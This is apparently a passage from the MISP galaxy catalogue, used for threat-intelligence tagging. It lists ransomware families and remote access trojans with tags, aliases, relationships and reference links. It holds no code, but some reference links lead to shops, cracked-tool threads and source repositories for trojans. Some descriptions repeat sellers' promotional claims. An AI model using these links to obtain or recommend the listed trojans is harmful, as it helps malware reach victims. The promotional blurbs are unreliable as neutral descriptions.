The tag is: misp-galaxy:ransomware="InstallPay"

MetadataBin

ransomware

The tag is: misp-galaxy:ransomware="MetadataBin"

TechandStrat

ransomware

The tag is: misp-galaxy:ransomware="TechandStrat"

Mars

ransomware

The tag is: misp-galaxy:ransomware="Mars"

Scatterbrain

ransomware

The tag is: misp-galaxy:ransomware="Scatterbrain"

CCECrypt

ransomware

The tag is: misp-galaxy:ransomware="CCECrypt"

SZ40

ransomware

The tag is: misp-galaxy:ransomware="SZ40"

Pay2Key

ransomware

The tag is: misp-galaxy:ransomware="Pay2Key"

Tripoli

ransomware

The tag is: misp-galaxy:ransomware="Tripoli"

Devos

ransomware

The tag is: misp-galaxy:ransomware="Devos"

HowAreYou

ransomware

The tag is: misp-galaxy:ransomware="HowAreYou"

SifreCikis

ransomware

The tag is: misp-galaxy:ransomware="SifreCikis"

68-Random-HEX

ransomware

The tag is: misp-galaxy:ransomware="68-Random-HEX"

RedRoman

ransomware

The tag is: misp-galaxy:ransomware="RedRoman"

MXX

ransomware

The tag is: misp-galaxy:ransomware="MXX"

Exerwa CTF

ransomware

The tag is: misp-galaxy:ransomware="Exerwa CTF"

HelloKitty

ransomware

The tag is: misp-galaxy:ransomware="HelloKitty"

HolidayCheer

ransomware

The tag is: misp-galaxy:ransomware="HolidayCheer"

Joker Korean

ransomware

The tag is: misp-galaxy:ransomware="Joker Korean"

VenomRAT

ransomware

The tag is: misp-galaxy:ransomware="VenomRAT"

FileEngineering

ransomware

The tag is: misp-galaxy:ransomware="FileEngineering"

LandSlide

ransomware

The tag is: misp-galaxy:ransomware="LandSlide"

Mobef-JustFun

ransomware

The tag is: misp-galaxy:ransomware="Mobef-JustFun"

View relationships graph

Mobef-JustFun has relationships with:

similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Amjixius

ransomware

The tag is: misp-galaxy:ransomware="Amjixius"

Amjixius is also known as:

Ancrypted

Table 5882. Table References
Links
https://malware-guide.com/blog/remove-amjixius-ransomware-restore-encrypted-files

DearCry

ransomware

The tag is: misp-galaxy:ransomware="DearCry"

JoJoCrypter

ransomware

The tag is: misp-galaxy:ransomware="JoJoCrypter"

RunExeMemory

ransomware

The tag is: misp-galaxy:ransomware="RunExeMemory"

Pay2Decrypt

ransomware

The tag is: misp-galaxy:ransomware="Pay2Decrypt"

Tortoise

ransomware

The tag is: misp-galaxy:ransomware="Tortoise"

EPICALLY

ransomware

The tag is: misp-galaxy:ransomware="EPICALLY"

Random30

ransomware

The tag is: misp-galaxy:ransomware="Random30"

Hog

ransomware

The tag is: misp-galaxy:ransomware="Hog"

Steel

ransomware

The tag is: misp-galaxy:ransomware="Steel"

JohnBorn

ransomware

The tag is: misp-galaxy:ransomware="JohnBorn"

Egalyty

ransomware

The tag is: misp-galaxy:ransomware="Egalyty"

Namaste

ransomware

The tag is: misp-galaxy:ransomware="Namaste"

HDLocker

ransomware

The tag is: misp-galaxy:ransomware="HDLocker"

Epsilon

ransomware

The tag is: misp-galaxy:ransomware="Epsilon"

DeroHE

ransomware

The tag is: misp-galaxy:ransomware="DeroHE"

Vovalex

ransomware

The tag is: misp-galaxy:ransomware="Vovalex"

Bonsoir

ransomware

The tag is: misp-galaxy:ransomware="Bonsoir"

PulpFictionQuote

ransomware

The tag is: misp-galaxy:ransomware="PulpFictionQuote"

NAS Data Compromiser

ransomware

The tag is: misp-galaxy:ransomware="NAS Data Compromiser"

CNH

ransomware

The tag is: misp-galaxy:ransomware="CNH"

Lucy

ransomware

The tag is: misp-galaxy:ransomware="Lucy"

OCT

ransomware

The tag is: misp-galaxy:ransomware="OCT"

OCT is also known as:

OctEncrypt

Pump

ransomware

The tag is: misp-galaxy:ransomware="Pump"

LuciferCrypt

ransomware

The tag is: misp-galaxy:ransomware="LuciferCrypt"

Ziggy

ransomware

The tag is: misp-galaxy:ransomware="Ziggy"

CoderCrypt

ransomware

The tag is: misp-galaxy:ransomware="CoderCrypt"

BlueEagle

ransomware

The tag is: misp-galaxy:ransomware="BlueEagle"

Povisomware

ransomware

The tag is: misp-galaxy:ransomware="Povisomware"

JCrypt

ransomware

The tag is: misp-galaxy:ransomware="JCrypt"

Uh-Oh

ransomware

The tag is: misp-galaxy:ransomware="Uh-Oh"

Mijnal

ransomware

The tag is: misp-galaxy:ransomware="Mijnal"

16x

The tag is: misp-galaxy:ransomware="16x"

Lockedv1

ransomware

The tag is: misp-galaxy:ransomware="Lockedv1"

XD Locker

ransomware

The tag is: misp-galaxy:ransomware="XD Locker"

Knot

ransomware

The tag is: misp-galaxy:ransomware="Knot"

Parasite

ransomware

The tag is: misp-galaxy:ransomware="Parasite"

Judge

ransomware

The tag is: misp-galaxy:ransomware="Judge"

DEcovid19

ransomware

The tag is: misp-galaxy:ransomware="DEcovid19"

Ragnarok

Ragnarok is is a ransomware that targetscorporate networks in Big Game Huntingtargeted attacks. The ransomware is associated with 'double-extortion' tactic, stealing and publishing files on a data leak site (DLS).

The tag is: misp-galaxy:ransomware="Ragnarok"

Table 5883. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnaro
https://borncity.com/win/2021/03/27/tu-darmstadt-opfer-der-ragnarok-ransomware/

RAT

remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system..

RAT is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various - raw-data

Iperius Remote

Iperius Remote is advertised with these features: Control remotely any computer with Iperius Remote Desktop Free. For remote support or presentations. Ideal for technical assistance. Easy to use and secure.

The tag is: misp-galaxy:rat="Iperius Remote"

Table 5884. Table References
Links
https://www.iperiusremote.com

TeamViewer

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The tag is: misp-galaxy:rat="TeamViewer"

Table 5885. Table References
Links
https://www.teamviewer.com

JadeRAT

JadeRAT is just one example of numerous mobile surveillanceware families we’ve seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage.

The tag is: misp-galaxy:rat="JadeRAT"

View relationships graph

JadeRAT has relationships with:

similar: misp-galaxy:malpedia="JadeRAT" with estimative-language:likelihood-probability="likely"

Table 5886. Table References
Links
https://blog.lookout.com/mobile-threat-jaderat
https://www.cfr.org/interactive/cyber-operations/jaderat

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

The tag is: misp-galaxy:rat="Back Orifice"

Back Orifice is also known as:

Table 5887. Table References
Links
http://www.cultdeadcow.com/tools/bo.html
http://www.symantec.com/avcenter/warn/backorifice.html

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.

The tag is: misp-galaxy:rat="Netbus"

Netbus is also known as:

NetBus

Table 5888. Table References
Links
http://www.symantec.com/avcenter/warn/backorifice.html
https://www.f-secure.com/v-descs/netbus.shtml

PoisonIvy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: misp-galaxy:rat="PoisonIvy"

PoisonIvy is also known as:

Poison Ivy
Backdoor.Win32.PoisonIvy
Gen:Trojan.Heur.PT

View relationships graph

PoisonIvy has relationships with:

similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"
used-by: misp-galaxy:threat-actor="Anchor Panda" with estimative-language:likelihood-probability="likely"

Table 5889. Table References
Links
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml

Sub7

Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.

The tag is: misp-galaxy:rat="Sub7"

Sub7 is also known as:

SubSeven
Sub7Server

Table 5890. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2001-020114-5445-99

Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

The tag is: misp-galaxy:rat="Beast Trojan"

Table 5891. Table References
Links
https://en.wikipedia.org/wiki/Beast_(Trojan_horse)

Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

The tag is: misp-galaxy:rat="Bifrost"

Table 5892. Table References
Links
https://www.revolvy.com/main/index.php?s=Bifrost%20(trojan%20horse)&item_type=topic
http://malware-info.blogspot.lu/2008/10/bifrost-trojan.html

Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers using Microsoft Windows -based operating systems.[2] According to US officials, over 500,000 computer systems have been infected worldwide with the software.

The tag is: misp-galaxy:rat="Blackshades"

View relationships graph

Blackshades has relationships with:

similar: misp-galaxy:tool="Blackshades" with estimative-language:likelihood-probability="likely"

Table 5893. Table References
Links
https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/

DarkComet

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

The tag is: misp-galaxy:rat="DarkComet"

DarkComet is also known as:

Dark Comet

View relationships graph

DarkComet has relationships with:

similar: misp-galaxy:tool="Dark Comet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="likely"

Table 5894. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/
https://blogs.cisco.com/security/talos/darkkomet-rat-spam

Lanfiltrator

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

The tag is: misp-galaxy:rat="Lanfiltrator"

Table 5895. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2002-121116-0350-99

Win32.HsIdir

The tag is: misp-galaxy:rat="Win32.HsIdir"

Table 5896. Table References
Links
http://lexmarket.su/thread-27692.html
https://www.nulled.to/topic/129749-win32hsidir-rat/

Optix Pro

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K

The tag is: misp-galaxy:rat="Optix Pro"

Table 5897. Table References
Links
https://en.wikipedia.org/wiki/Optix_Pro
https://www.symantec.com/security_response/writeup.jsp?docid=2002-090416-0521-99
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20208

Back Orifice 2000

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker’s remote access tool). It was created by the Cult of Dead Cow hackers group in July 1999. Originally the BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with CIH virus, so the people who got that CD might get infected and spread not only the compiled backdoor, but also the CIH virus.

The tag is: misp-galaxy:rat="Back Orifice 2000"

Back Orifice 2000 is also known as:

BO2k

Table 5898. Table References
Links
https://en.wikipedia.org/wiki/Back_Orifice_2000
https://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=10229
https://www.symantec.com/security_response/writeup.jsp?docid=2000-121814-5417-99
https://www.f-secure.com/v-descs/bo2k.shtml

RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

The tag is: misp-galaxy:rat="RealVNC"

RealVNC is also known as:

VNC Connect
VNC Viewer

Table 5899. Table References
Links
https://www.realvnc.com/

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

The tag is: misp-galaxy:rat="Adwind RAT"

Adwind RAT is also known as:

UNRECOM
UNiversal REmote COntrol Multi-Platform
Frutas
AlienSpy
Unrecom
Jsocket
JBifrost

View relationships graph

Adwind RAT has relationships with:

similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 5900. Table References
Links
https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf
https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml
https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat
https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Albertino Advanced RAT

The tag is: misp-galaxy:rat="Albertino Advanced RAT"

Table 5901. Table References
Links
https://www.virustotal.com/en/file/b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73/analysis/1359376345/

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

The tag is: misp-galaxy:rat="Arcom"

Table 5902. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99
http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/

BlackNix

BlackNix rat is a rat coded in delphi.

The tag is: misp-galaxy:rat="BlackNix"

Table 5903. Table References
Links
https://leakforums.net/thread-18123?tid=18123&&pq=1

Blue Banana

Blue Banana is a RAT (Remote Administration Tool) created purely in Java

The tag is: misp-galaxy:rat="Blue Banana"

Table 5904. Table References
Links
https://leakforums.net/thread-123872
https://techanarchy.net/2014/02/blue-banana-rat-config/

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

The tag is: misp-galaxy:rat="Bozok"

View relationships graph

Bozok has relationships with:

similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="likely"

Table 5905. Table References
Links
https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

ClientMesh

ClientMesh is a Remote Administration Application yhich allows a user to control a number of client PCs from around the world.

The tag is: misp-galaxy:rat="ClientMesh"

Table 5906. Table References
Links
https://sinister.ly/Thread-ClientMesh-RAT-In-Built-FUD-Crypter-Stable-DDoSer-No-PortForwading-40-Lifetime
https://blog.yakuza112.org/2012/clientmesh-rat-v5-cracked-clean/

CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim’s passwords and can also get the screen shots of his computer’s screen.

The tag is: misp-galaxy:rat="CyberGate"

View relationships graph

CyberGate has relationships with:

similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="likely"

Table 5907. Table References
Links
http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html
http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-e-mails-hint-corporate-hacking-conspiracy/

Dark DDoSeR

The tag is: misp-galaxy:rat="Dark DDoSeR"

Table 5908. Table References
Links
http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

The tag is: misp-galaxy:rat="DarkRat"

DarkRat is also known as:

DarkRAT

Table 5909. Table References
Links
https://www.infosecurity-magazine.com/blogs/the-dark-rat/
http://darkratphp.blogspot.lu/

Greame

The tag is: misp-galaxy:rat="Greame"

Table 5910. Table References
Links
https://sites.google.com/site/greymecompany/greame-rat-project

HawkEye

HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.

The tag is: misp-galaxy:rat="HawkEye"

Table 5911. Table References
Links
http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html
https://www.bleepingcomputer.com/news/security/zoho-heavily-used-by-keyloggers-to-transmit-stolen-data/

jRAT

jRAT is the cross-platform remote administrator tool that is coded in Java, Because its coded in Java it gives jRAT possibilities to run on all operation systems, Which includes Windows, Mac OSX and Linux distributions.

The tag is: misp-galaxy:rat="jRAT"

jRAT is also known as:

JacksBot

View relationships graph

jRAT has relationships with:

similar: misp-galaxy:malpedia="jRAT" with estimative-language:likelihood-probability="likely"

Table 5912. Table References
Links
https://www.rekings.com/shop/jrat/

jSpy

jSpy is a Java RAT.

The tag is: misp-galaxy:rat="jSpy"

View relationships graph

jSpy has relationships with:

similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="likely"

Table 5913. Table References
Links
https://leakforums.net/thread-479505

LuxNET

Just saying that this is a very badly coded RAT by the biggest skid in this world, that is XilluX. The connection is very unstable, the GUI is always flickering because of the bad Multi-Threading and many more bugs.

The tag is: misp-galaxy:rat="LuxNET"

Table 5914. Table References
Links
https://leakforums.net/thread-284656

NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

The tag is: misp-galaxy:rat="NJRat"

NJRat is also known as:

Njw0rm

View relationships graph

NJRat has relationships with:

similar: misp-galaxy:rat="Kiler RAT" with estimative-language:likelihood-probability="likely"

Table 5915. Table References
Links
https://www.cyber.nj.gov/threat-profiles/trojan-variants/njrat

Pandora

Remote administrator tool that has been developed for Windows operation system. With advanced features and stable structure, Pandora’s structure is based on advanced client / server architecture. was configured using modern technology.

The tag is: misp-galaxy:rat="Pandora"

Table 5916. Table References
Links
https://www.rekings.com/pandora-rat-2-2/

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

The tag is: misp-galaxy:rat="Predator Pain"

Predator Pain is also known as:

PredatorPain

View relationships graph

Predator Pain has relationships with:

similar: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 5917. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf

Punisher RAT

Remote administration tool

The tag is: misp-galaxy:rat="Punisher RAT"

Table 5918. Table References
Links
http://punisher-rat.blogspot.lu/

SpyGate

This is tool that allow you to control your computer form anywhere in world with full support to unicode language.

The tag is: misp-galaxy:rat="SpyGate"

Table 5919. Table References
Links
https://www.rekings.com/spygate-rat-3-2/
https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950
http://spygate-rat.blogspot.lu/

Small-Net

RAT

The tag is: misp-galaxy:rat="Small-Net"

Small-Net is also known as:

SmallNet

Table 5920. Table References
Links
http://small-net-rat.blogspot.lu/

Vantom

Vantom is a free RAT with good option and very stable.

The tag is: misp-galaxy:rat="Vantom"

Table 5921. Table References
Links
https://www.rekings.com/vantom-rat/

Xena

Xena RAT is a fully-functional, stable, state-of-the-art RAT, coded in a native language called Delphi, it has almost no dependencies.

The tag is: misp-galaxy:rat="Xena"

Table 5922. Table References
Links
https://leakforums.net/thread-497480

XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

The tag is: misp-galaxy:rat="XtremeRAT"

Table 5923. Table References
Links
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

The tag is: misp-galaxy:rat="Netwire"

Table 5924. Table References
Links
https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program. .

The tag is: misp-galaxy:rat="Gh0st RAT"

View relationships graph

Gh0st RAT has relationships with:

similar: misp-galaxy:malpedia="Ghost RAT" with estimative-language:likelihood-probability="likely"
used-by: misp-galaxy:threat-actor="Anchor Panda" with estimative-language:likelihood-probability="likely"

Table 5925. Table References
Links
https://www.volexity.com/blog/2017/03/23/have-you-been-haunted-by-the-gh0st-rat-today/

Plasma RAT

Plasma RAT’s stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.

The tag is: misp-galaxy:rat="Plasma RAT"

Table 5926. Table References
Links
http://www.zunzutech.com/blog/security/analysis-of-plasma-rats-source-code/

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++ which is an ideal language for high performance and the client is developed in C#(.Net Framework 4.5)

The tag is: misp-galaxy:rat="Babylon"

Table 5927. Table References
Links
https://www.rekings.com/babylon-rat/

Imminent Monitor

RAT

The tag is: misp-galaxy:rat="Imminent Monitor"

Table 5928. Table References
Links
http://www.imminentmethods.info/

DroidJack

DroidJack is a RAT (Remote Access Trojan/Remote Administration Tool) nature of remote accessing, monitoring and managing tool (Java based) for Android mobile OS. You can use it to perform a complete remote control to any Android devices infected with DroidJack through your PC. It comes with powerful function and user-friendly operation – even allows attackers to fully take over the mobile phone and steal, record the victim’s private data wilfully.

The tag is: misp-galaxy:rat="DroidJack"

Table 5929. Table References
Links
http://droidjack.net/

Quasar RAT

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface

The tag is: misp-galaxy:rat="Quasar RAT"

View relationships graph

Quasar RAT has relationships with:

similar: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

Table 5930. Table References
Links
https://github.com/quasar/QuasarRAT
https://researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/
https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Dendroid

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early of 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google’s Bouncer and caused researchers to warn about it being easier to create Android malware due to it. It also seems to have follow in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.

The tag is: misp-galaxy:rat="Dendroid"

View relationships graph

Dendroid has relationships with:

similar: misp-galaxy:mitre-malware="Dendroid - S0301" with estimative-language:likelihood-probability="likely"

Table 5931. Table References
Links
https://github.com/qqshow/dendroid
https://github.com/nyx0/Dendroid

Ratty

A Java R.A.T. program

The tag is: misp-galaxy:rat="Ratty"

View relationships graph

Ratty has relationships with:

similar: misp-galaxy:malpedia="Ratty" with estimative-language:likelihood-probability="likely"

Table 5932. Table References
Links
https://github.com/shotskeber/Ratty

RaTRon

Java RAT

The tag is: misp-galaxy:rat="RaTRon"

Table 5933. Table References
Links
http://level23hacktools.com/forum/showthread.php?t=27971
https://leakforums.net/thread-405562?tid=405562&&pq=1

Arabian-Attacker RAT

The tag is: misp-galaxy:rat="Arabian-Attacker RAT"

Table 5934. Table References
Links
http://arabian-attacker.software.informer.com/

Androrat

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

The tag is: misp-galaxy:rat="Androrat"

Table 5935. Table References
Links
https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/
https://github.com/wszf/androrat

Adzok

Remote Administrator

The tag is: misp-galaxy:rat="Adzok"

Table 5936. Table References
Links
http://adzok.com/

Schwarze-Sonne-RAT

The tag is: misp-galaxy:rat="Schwarze-Sonne-RAT"

Schwarze-Sonne-RAT is also known as:

SS-RAT
Schwarze Sonne

Table 5937. Table References
Links
https://github.com/mwsrc/Schwarze-Sonne-RAT

Cyber Eye RAT

The tag is: misp-galaxy:rat="Cyber Eye RAT"

Table 5938. Table References
Links
https://www.indetectables.net/viewtopic.php?t=24245

Batch NET

The tag is: misp-galaxy:rat="Batch NET"

RWX RAT

The tag is: misp-galaxy:rat="RWX RAT"

Table 5939. Table References
Links
https://leakforums.net/thread-530663

Spynet

Spy-Net is a software that allow you to control any computer in world using Windows Operating System.He is back using new functions and good options to give you full control of your remote computer.Stable and fast, this software offer to you a good interface, creating a easy way to use all his functions

The tag is: misp-galaxy:rat="Spynet"

Table 5940. Table References
Links
http://spynet-rat-officiel.blogspot.lu/

CTOS

The tag is: misp-galaxy:rat="CTOS"

Table 5941. Table References
Links
https://leakforums.net/thread-559871

Virus RAT

The tag is: misp-galaxy:rat="Virus RAT"

Table 5942. Table References
Links
https://github.com/mwsrc/Virus-RAT-v8.0-Beta

Atelier Web Remote Commander

The tag is: misp-galaxy:rat="Atelier Web Remote Commander"

Table 5943. Table References
Links
http://www.atelierweb.com/products/

drat

A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forev

The tag is: misp-galaxy:rat="drat"

Table 5944. Table References
Links
https://github.com/chrismattmann/drat

MoSucker

MoSucker is a powerful backdoor - hacker’s remote access tool.

The tag is: misp-galaxy:rat="MoSucker"

Table 5945. Table References
Links
https://www.f-secure.com/v-descs/mosuck.shtml

Theef

The tag is: misp-galaxy:rat="Theef"

Table 5946. Table References
Links
http://www.grayhatforum.org/thread-4373-post-5213.html#pid5213
http://www.spy-emergency.com/research/T/Theef_Download_Creator.html
http://www.spy-emergency.com/research/T/Theef.html

ProRat

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

The tag is: misp-galaxy:rat="ProRat"

Table 5947. Table References
Links
http://prorat.software.informer.com/
http://malware.wikia.com/wiki/ProRat

Setro

The tag is: misp-galaxy:rat="Setro"

Table 5948. Table References
Links
https://sites.google.com/site/greymecompany/setro-rat-project

Indetectables RAT

The tag is: misp-galaxy:rat="Indetectables RAT"

Table 5949. Table References
Links
http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html

Luminosity Link

The tag is: misp-galaxy:rat="Luminosity Link"

Table 5950. Table References
Links
https://luminosity.link/

Orcus

The tag is: misp-galaxy:rat="Orcus"

Table 5951. Table References
Links
https://orcustechnologies.com/

Blizzard

The tag is: misp-galaxy:rat="Blizzard"

Table 5952. Table References
Links
http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html

Kazybot

The tag is: misp-galaxy:rat="Kazybot"

Table 5953. Table References
Links
https://www.rekings.com/kazybot-lite-php-rat/
http://telussecuritylabs.com/threats/show/TSL20150122-06

BX

The tag is: misp-galaxy:rat="BX"

Table 5954. Table References
Links
http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html

death

The tag is: misp-galaxy:rat="death"

Sky Wyder

The tag is: misp-galaxy:rat="Sky Wyder"

Table 5955. Table References
Links
https://rubear.me/threads/sky-wyder-2016-cracked.127/

DarkTrack

The tag is: misp-galaxy:rat="DarkTrack"

Table 5956. Table References
Links
https://www.rekings.com/darktrack-4-alien/
http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml

xRAT

Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).

The tag is: misp-galaxy:rat="xRAT"

Table 5957. Table References
Links
https://github.com/c4bbage/xRAT

Biodox

The tag is: misp-galaxy:rat="Biodox"

Table 5958. Table References
Links
http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html

Offence

Offense RAT is a free renote administration tool made in Delphi 9.

The tag is: misp-galaxy:rat="Offence"

Table 5959. Table References
Links
https://leakforums.net/thread-31386?tid=31386&&pq=1

Apocalypse

The tag is: misp-galaxy:rat="Apocalypse"

View relationships graph

Apocalypse has relationships with:

similar: misp-galaxy:ransomware="Apocalypse" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

